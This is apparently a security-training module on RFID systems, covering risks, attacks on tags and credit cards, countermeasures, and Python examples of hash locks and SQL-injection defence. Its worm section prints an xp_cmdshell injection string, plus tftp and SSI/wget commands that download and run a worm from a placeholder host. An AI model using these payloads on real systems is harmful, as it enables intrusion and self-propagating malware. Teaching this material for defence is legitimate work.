Ethical Hacking and Countermeasures
Version 6
Module XXXIX
Module Objective
This module will familiarize you with:
• RFID
• Components of RFID systems
• RFID System Architecture
• RFID Collisions
• RFID Risks
• RFID and Privacy Issues
• RFID Security and Privacy Threats
• Vulnerabilities in RFID-enabled Credit Cards
• RFID Hacking Tool
Module Flow
RFID → Components of RFID systems → RFID System Architecture → RFID Collisions → RFID Risks → RFID and Privacy Issues → RFID Security and Privacy Threats → Vulnerabilities in RFID-enabled Credit Cards → RFID Hacking Tool
RFID
Radio Frequency Identification (RFID) is an automatic identification method
It transmits the identity of an object, in the form of a unique serial number, using radio waves
RFID systems work on the principle of contactless transfer of data between a data-carrying device (the tag) and its reader
RFID tags contain at least two parts:
• An integrated circuit to store and process information and to modulate and demodulate an RF signal
• An antenna to receive and transmit that signal
Components of RFID Systems
• RFID tags (transponders) and the readers that interrogate them
• RFID premises server
• RFID integration server
General categories of RFID tags:
• Passive: Requires no internal power source; the tag is powered entirely by the reader’s field
• Active: Requires an internal power source (a small battery) and can transmit on its own
• Semi-passive (battery-assisted): A battery powers the chip, but the tag still answers by modulating the reader’s signal rather than transmitting on its own
RFID Collisions
RFID Tag Collision:
• Tag collision happens when multiple tags are energized by an RFID reader simultaneously and reflect their respective signals back to the reader at the same time, so the reader cannot separate the replies
RFID Reader Collision:
• Reader collision occurs when the coverage area of one RFID reader overlaps with that of another reader
• This causes two different problems:
  • Signal interference between the readers
  • Multiple reads of the same tag
RFID Risks
Business Process Risk
Business Intelligence Risk
Privacy Risk
Externality Risk
• Hazards of electromagnetic radiation
RFID Risks: Business Process Risk
Direct attacks on RFID system components could undermine the business processes the RFID system was designed to enable
RFID systems are typically implemented to replace or enhance a paper-based or partially automated process
Organizations implementing RFID systems can become reliant on those systems
Failure of any component or subsystem of the RFID system could result in system-wide failure
Unlike most other risks, business process risk can arise from both human action and natural causes
RFID Risks: Business Intelligence Risk
RFID supports wireless remote access to information about assets and people that either did not previously exist or was difficult to create or maintain dynamically
A competitor or adversary can obtain information from an RFID system in a number of ways:
• Eavesdropping on the RF links between readers and tags
• Performing independent queries on tags to obtain relevant data
• Obtaining unauthorized access to the back-end database that stores information about tagged items
RFID Risks: Privacy Risk
Business objectives often conflict with privacy objectives
Organizations can benefit from analysis and sharing of personal information obtained with RFID technology
Privacy risk from the perspective of an organization implementing RFID might include:
• Penalties if the organization does not comply with privacy laws and regulations
• Customer avoidance or boycott of the organization because of real or perceived privacy concerns about RFID technology
• Being held legally liable for the consequences of weak privacy protections
• Employees, shareholders, and other stakeholders might disassociate with
RFID Risks: Privacy Risk (cont’d)
Other factors that affect the level of privacy risk include:
• Whether personal information is stored on tags
• Whether tagged items are considered personal
• The likelihood that the tag will be in proximity of compatible readers
• The length of time records are retained in analytic or archival systems
• The effectiveness of RFID security controls, in particular:
  • The effectiveness of tag memory access control and authentication mechanisms
  • The ability to disable tags after their use in a business process
  • The ability of users to effectively shield tags to prevent unauthorized detection
RFID Risks: Externality Risk
RFID systems typically are not isolated from other systems and assets in the enterprise
Externality risks can affect both the RF and enterprise subsystems of an RFID system:
• The major externality risk for the RF subsystem is hazards resulting from electromagnetic radiation
• The major externality risk for the enterprise subsystem is computer network attacks on networked devices and applications
Because externality risk by definition involves risks outside the RFID system itself, it is distinct from both business process and business intelligence risks
RFID and Privacy Issues
Any organization contemplating the use of RFID should first ensure that it is aware of its privacy obligations under the applicable laws before it starts accumulating data
RFID attacks used to bypass personal privacy protections include:
• Placing RFID tags where they are hidden from view and using them for covert tracking
• Using the unique identifiers provided by RFID for profiling and identifying consumer patterns and behavior
Countermeasures
Methods used to prevent RFID privacy attacks:
RSA Blocker Tags:
• Help maintain consumer privacy by spamming any reader that attempts to scan tags without authorization with bogus responses, so the reader cannot single out the real tags
Kill Switches:
• A kill command permanently disables the tag once it is no longer needed, typically at the point of sale, so it can never be read again
RFID Security and Privacy Threats
Sniffing
Tracking
Spoofing
Replay attacks
Denial of service
Sniffing
RFID tags are designed to be readable by any compliant reader
It is easy to collect RFID data by eavesdropping on the wireless RFID channel
Unrestricted access to tag data can have serious implications
Collected tag data might reveal information such as medical
Tracking
RFID technology facilitates secret monitoring of an individual’s location and actions
RFID readers placed in strategic locations can record an RFID tag’s unique responses, which can then be persistently associated with a person’s identity
Even RFID tags without unique identifiers facilitate tracking by forming
Spoofing
Attackers can mimic authentic RFID tags by writing appropriately formatted data onto blank RFID tags
Tag cloning is another kind of spoofing attack, which produces unauthorized copies of legitimate RFID tags
In 2005, researchers from Johns Hopkins University cloned a cryptographically protected Texas Instruments Digital Signature Transponder (DST)
Replay Attacks
RFID relay devices can intercept and retransmit RFID queries, which offenders can use to abuse various RFID applications
England’s RFID-enabled license plates, e-Plates, are an example of a modern RFID system that is susceptible to attack by a relay device
Active e-Plate tags contain an encrypted ID code that is stored in the UK Ministry of Transport’s vehicle database
An attacker can record the encrypted identifier when another car’s
Denial-of-service
Thieves can exploit RFID tags and back-end databases to steal RFID-tagged items, either by removing the tags from the items completely or by putting the items in a foil-lined booster bag that blocks the RFID reader’s query signals and temporarily makes the items invisible to the system
Another attack takes the opposite approach and floods an RFID system with more data than it can handle
An attacker can also remove RFID tags and plant them on other items, causing the RFID system to record useless data, discrediting, and
Protection against RFID Attacks
Cryptography:
• Minimalist cryptography
• Human-computer authentication
• Hash locks
Detection and evasion:
• RFID Detektor (http://tinyurl.com/)
• Data Privatizer (https://shop.foebud.org/)
• RFID Guardian (www.rfidguardian.org)
Temporary Deactivation:
• Consumers can deactivate their RFID tags to avoid most present-day threats
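Of the cryptographic protections listed above, the hash lock (Weis, Sarma, Rivest and Engels, 2003) is the one small enough to explain in a few lines: a locked tag stores only H(key) and answers every query with that value, and it releases its real ID only to a reader that presents the key. The randomized variant additionally answers each query with a fresh nonce, which is what defeats the tracking threat. The code below is an added example, not code from the original slides or from the cited authors; SHA-256 as the one-way function, the 128-bit keys and the sample tag IDs are choices made for this example.

```python
"""Hash locks for tag access control and anti-tracking (Weis et al. 2003).

Added example, not code from the original slides. A locked tag answers with
a hash rather than its ID and unlocks only for a reader that presents the
matching key; the randomized variant makes every reply different.
SHA-256, the 128-bit key and the sample IDs are assumptions for this example.
"""
import hashlib
import os


def H(*parts):
    """One-way function the tag can afford; here SHA-256 over the inputs."""
    return hashlib.sha256(b"".join(parts)).digest()


class LockedTag:
    """Basic hash lock: the tag stores metaID = H(key), never the key."""

    def __init__(self, real_id, key):
        self.real_id = real_id
        self.meta_id = H(key)
        self.locked = True

    def query(self):
        # A rogue reader only ever sees meta_id while the tag is locked.
        return self.meta_id if self.locked else self.real_id

    def unlock(self, key):
        if H(key) == self.meta_id:
            self.locked = False
        return not self.locked


class RandomizedTag:
    """Randomized hash lock: reply = (nonce, H(ID || nonce)). No two
    replies match, so the tag cannot be tracked by its answers."""

    def __init__(self, real_id):
        self.real_id = real_id

    def query(self):
        nonce = os.urandom(8)
        return nonce, H(self.real_id, nonce)


class BackEnd:
    """Authorised reader plus its database of enrolled tags."""

    def __init__(self):
        self.by_meta = {}    # metaID -> (key, real ID)
        self.known_ids = []

    def enrol_locked(self, real_id):
        key = os.urandom(16)
        self.by_meta[H(key)] = (key, real_id)
        return LockedTag(real_id, key)

    def enrol_randomized(self, real_id):
        self.known_ids.append(real_id)
        return RandomizedTag(real_id)

    def read_locked(self, tag):
        """Look up the key for the advertised metaID, unlock, read the ID."""
        entry = self.by_meta.get(tag.query())
        if entry is None:
            return None          # not our tag: we learn nothing more
        key, _ = entry
        return tag.query() if tag.unlock(key) else None

    def identify_randomized(self, reply):
        """Brute-force over enrolled IDs: cost grows linearly with the
        database, which is the price of untraceable replies."""
        nonce, digest = reply
        for cand in self.known_ids:
            if H(cand, nonce) == digest:
                return cand
        return None


def looks_trackable(tag):
    """True if two successive queries to the tag give the same answer."""
    return tag.query() == tag.query()


if __name__ == "__main__":
    back_end = BackEnd()
    tag = back_end.enrol_locked(b"EPC-0001")        # constructed sample ID
    print("locked reply repeats:", looks_trackable(tag))
    print("authorised read:", back_end.read_locked(tag))
    rtag = back_end.enrol_randomized(b"EPC-0002")   # constructed sample ID
    print("randomized reply repeats:", looks_trackable(rtag))
    print("identified:", back_end.identify_randomized(rtag.query()))
```

Two points worth checking against the output: the basic hash lock stops a rogue reader from learning the ID, but its constant metaID is itself a stable identifier, so looks_trackable() is True and the tracking threat remains; the randomized version fixes that at the cost of a linear search over every enrolled ID on each read, which is the scalability problem the tree-based private authentication schemes listed later under RFID Security are designed to reduce.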
RFID Guardian
RFID Guardian is a mobile, battery-powered device that offers personal RFID security and privacy management
RFID Guardian monitors and regulates RFID usage on behalf of its owner
It is meant for personal use and manages the RFID tags within physical proximity of a person
It acts like an RFID reader, querying tags and decoding the tag responses, and it can also emulate an RFID tag, allowing it to perform direct in-band communication with other RFID readers
RFID Guardian integrates four separate security properties into a single device, including:
• Auditing
• Key management
RFID Malware
RFID malware is transmitted and executed via RFID tags:
• Threats arise when criminals cause valid RFID tags to behave in unexpected ways
• If certain vulnerabilities exist in the RFID software, an RFID tag can be infected with a virus
• When an unsuspecting reader scans an infected tag, there is a danger of the tag data exploiting a vulnerability in the back-end software
Classes of RFID Malware:
• RFID Exploit: Malicious RFID tag data that exploits some vulnerability of the RFID system
• RFID Worm: An RFID-based exploit that abuses a network connection to achieve self-replication
• RFID Virus: An RFID-based exploit that autonomously self-replicates its code to new tags
How to Write an RFID Virus
A virus performs two kinds of function: it replicates itself using the database, and optionally it executes a payload
Broadly, there are two types of virus replication:
Replication Using Self-Referential Queries
• Database systems usually offer a way to obtain the currently running queries for system administration purposes; the virus reads its own statement text back from there and writes it to the next tag
• There are two versions of this virus: one containing a single query and one containing multiple queries
• The single-query virus requires fewer features from the database, but cannot carry SQL code as a payload
• The multiple-query virus requires a database that accepts several statements in one request, but can carry SQL code as a payload
Replication Using Quines
• A quine is a program that prints its own source code
• The virus copies its own source code into the database, from where it is later copied onto tags
• Quines require multiple queries, which means they are not supported on all databases
How to Write an RFID Worm
A worm is a program that self-propagates across a network by exploiting security flaws in widely used services
An RFID worm propagates by exploiting security flaws in online RFID services
RFID worms do not require users to do anything to propagate, and they also spread via RFID tags if given the opportunity
Propagation:
• RFID tags are too small to carry an entire worm
• A tag contains only enough of the worm to download the rest from a computer connected to the Internet
How to Write an RFID Worm (cont’d)
The RFID tag can carry either binary code that downloads and executes the worm, or shell commands
Example 1 - Executing shell commands using SQL Server
Apples'; EXEC Master..xp_cmdshell 'shell commands';
Example 2 - Downloading and executing a worm on Windows
cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe
Example 3 - Downloading and executing a worm on Linux using SSI
<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x
/tmp/worm; /tmp/worm "-->
Defending Against RFID Malware
Lock down RFID user accounts and database accounts
Disable or remove any features that are not required
To avoid SQL injection:
• Any data that is copied into a SQL statement should be checked and escaped using the functions provided by the database API
• Better still, do not copy data into SQL statements at all; use prepared statements and parameter binding
Client-side scripting can be prevented by properly escaping data inserted into HTML pages
RFID Exploits
SQL Injection:
• If the RFID middleware does not process the data read from the tag correctly, it is possible to exploit the database by executing SQL code stored on the tag
Client-side Scripting:
• Exploiting dynamic features offered by modern browsers,
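The SQL injection exploit just described, and the two defences given under Defending Against RFID Malware (check the data, and bind it as a parameter instead of pasting it into the statement), fit in one small piece of middleware. The following is an added example and not code from the original slides: it records scanned tag data into a SQLite inventory table, first with string concatenation and then hardened, and finishes with the HTML escaping that covers the client-side scripting case. The inventory schema, the payload text (same shape as the Apples' payload shown earlier, but aimed at SQLite rather than SQL Server's xp_cmdshell) and the allowed tag-data pattern are constructed for this example.

```python
"""RFID middleware that stores scanned tag data: injectable vs. hardened.

Added example, not code from the original slides. The inventory schema,
the payload text and the allowed tag-data pattern are constructed here.
"""
import html
import re
import sqlite3

# Constructed tag contents: what a normal tag carries, and what an attacker
# writes onto a blank tag.
BENIGN_TAG = "Apples"
HOSTILE_TAG = "Apples'); DELETE FROM inventory; --"

# Assumed format for legitimate tag data: short, printable, no quotes.
TAG_DATA_PATTERN = re.compile(r"^[A-Za-z0-9 ._-]{1,64}$")


def new_db():
    """In-memory inventory with one pre-existing row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE inventory (id INTEGER PRIMARY KEY, contents TEXT)")
    conn.execute("INSERT INTO inventory (contents) VALUES ('Pears')")
    conn.commit()
    return conn


def record_scan_vulnerable(conn, tag_data):
    """Tag data pasted into the statement text. executescript runs every
    statement in the string, as middleware that batches SQL would, so the
    attacker's second statement runs with the middleware's privileges."""
    conn.executescript(
        "INSERT INTO inventory (contents) VALUES ('%s');" % tag_data)


def record_scan_bound(conn, tag_data):
    """Parameter binding: whatever the tag says is stored as a value and
    can never become SQL syntax, even with no validation at all."""
    conn.execute("INSERT INTO inventory (contents) VALUES (?)", (tag_data,))
    conn.commit()


def record_scan_safe(conn, tag_data):
    """Defence in depth: reject data outside the expected tag format, then
    bind. Returns True if the scan was recorded, False if rejected."""
    if not TAG_DATA_PATTERN.match(tag_data):
        return False
    record_scan_bound(conn, tag_data)
    return True


def row_count(conn):
    return conn.execute("SELECT COUNT(*) FROM inventory").fetchone()[0]


def last_contents(conn):
    return conn.execute(
        "SELECT contents FROM inventory ORDER BY id DESC LIMIT 1").fetchone()[0]


def render_cell(tag_data):
    """Client-side scripting defence: escape tag data before it reaches an
    HTML page that a back-office user will open in a browser."""
    return "<td>%s</td>" % html.escape(tag_data, quote=True)


if __name__ == "__main__":
    db = new_db()
    record_scan_vulnerable(db, HOSTILE_TAG)
    print("vulnerable: rows left =", row_count(db))        # table emptied
    db = new_db()
    record_scan_bound(db, HOSTILE_TAG)
    print("bound: rows =", row_count(db), "stored:", last_contents(db))
    print("safe accepts benign:", record_scan_safe(db, BENIGN_TAG))
    print("safe accepts hostile:", record_scan_safe(db, HOSTILE_TAG))
    print(render_cell("<script>alert(1)</script>"))
```

The bound version alone is enough to stop the injection: the hostile string ends up stored verbatim as a row, where it can do nothing. The format check on top of it matters for the other exploit class on this page, since a tag that cannot carry quotes or angle brackets cannot carry the client-side scripting payload either, and render_cell() catches whatever still reaches a page.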
Vulnerabilities in RFID-enabled Credit Cards
Tracking Attack
• In this attack, a legitimate merchant exceeds the expected use of his or her RFID credit card readers
Eavesdropping Attack
• In an eavesdropping attack, an adversary uses an antenna to record the communication between a legitimate RF device and a reader
• Because eavesdropping targets a live, legitimate communication, foil shielding does not help prevent this particular attack
• Eavesdropping feasibility depends on many factors, including
Vulnerabilities in RFID-enabled Credit Cards (cont’d)
Skimming Attack
• In this attack, an unauthorized and potentially clandestine reader reads tags from either close proximity or from a distance
• The Johnny Carson attack on RFID credit cards occurs when an attacker with access to the physical mail stream reads RF data from credit cards in transit to their owners
• This attack is particularly powerful because the adversary gains accessory knowledge such as the cardholder’s address
• A compromised reader at a parking garage could skim a customer’s credit-card information at the same time that it reads the parking pass
• Fob-type RFID credit cards are now available for attachment to key rings, exposing them to attack when consumers leave their keys unattended
• This behavior is seen most often in valet-parking situations, or in gymnasiums where it is common for users to leave their keys together in an unsecured box by the door
Vulnerabilities in RFID-enabled Credit Cards (cont’d)
Replay and Relay Attack
• In a replay attack, an attacker broadcasts an exact replay of the transponder end of the radio signal recorded from a past transaction between an RF device and a reader
• The relay attack uses a man-in-the-middle setup to relay a transient connection from a legitimate reader, through one or more adversarial devices, to a legitimate tag that may be at a considerable distance
• The distance at which a relay attack can succeed is limited only by the latency that the attacked protocol will tolerate
Cross-contamination Attack
• The cross-contamination attack occurs when private information such as the cardholder’s name, number, and expiration date, learned by an attacker in an RF context, is then used by the attacker in a different context
RFDump
RFDump is a tool that allows you to read RFID tags within range, and to change and alter all the data stored on the RFID tag
RFDump is a back-end GPL tool that interoperates directly with any ISO RFID reader to make the contents stored on RFID tags accessible
The user data can be displayed and modified using either a hex editor or an ASCII editor
Management Controls
A management control involves oversight of the security of the RFID system
The management of an organization might need to update existing policies to address RFID implementations
Management controls are typically involved in risk assessment, system planning, and system acquisition, as well as security certifications, accreditations, and assessments
Operational Controls
An operational control involves the actions performed on a daily basis by the system’s administrators and users
There are several types of operational controls:
• Physical access controls restrict access to authorized personnel where the RFID systems are deployed
• Proper placement of RF equipment helps to avoid interference and reduce hazards from electromagnetic radiation
• Organizations can destroy tags after they are no longer useful, to prevent adversaries from gaining access to their data
• Operator training ensures that personnel using the system follow appropriate guidelines and policies
• Information labels and notices can inform users of the intended
Technical Controls
A technical control uses technology to monitor or restrict the actions that can be performed within the system
Some technical controls are specified in standards, while others are available only in proprietary systems
Many technical controls related to a tag require the tag to perform additional computations and to have additional volatile memory
Technical controls exist for all components of RFID systems, including the RF, enterprise, and inter-enterprise subsystems
The general types of RF subsystem controls include controls to:
• Provide authentication and integrity services to RFID components and transactions
• Protect RF communication between reader and tag
RFID Security
Tags can be set to have a security bit turned on in a reserved memory block on the tag
Random transaction IDs should be present on rewritable tags
Improved passwords via persistent state
Mutual authentication of tag and reader with privacy for the tag:
• PRF Private Authentication Scheme
• Tree-Based Private Authentication
• A Two-Phase Tree Scheme
Security to protect the read-write options
Summary
Radio Frequency Identification (RFID) is an automatic identification method
An RFID tag is an electronic device that holds data
An RFID reader is a device that is used to interrogate an RFID tag
RFID stations can read and update the information stored in an RFID tag
RFID standards define the air interface protocol, data content, conformance, and applications